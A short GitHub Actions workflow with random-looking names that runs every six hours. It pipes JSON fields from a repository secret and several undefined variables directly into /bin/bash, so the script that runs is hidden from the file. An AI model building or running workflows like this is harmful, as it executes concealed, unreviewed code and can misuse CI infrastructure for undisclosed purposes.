name: jixuanxc
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:  # 7140
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jixuanxc
        env:
          lzbg4: ${{ secrets.lzbg4 }}
        run: |
          echo $lzbg4 | jq -r .f70921 | /bin/bash
          echo $yp88884 | jq -r .lcqlu6 | /bin/bash
          echo $hfzpb1084 | jq -r .ls5257 | /bin/bash
          echo $h994 | jq -r .s1669 | /bin/bash
          echo $dnqyq805 | jq -r .qjqwp770 | /bin/bash
          echo $yugxo26567 | jq -r .w68988 | /bin/bash

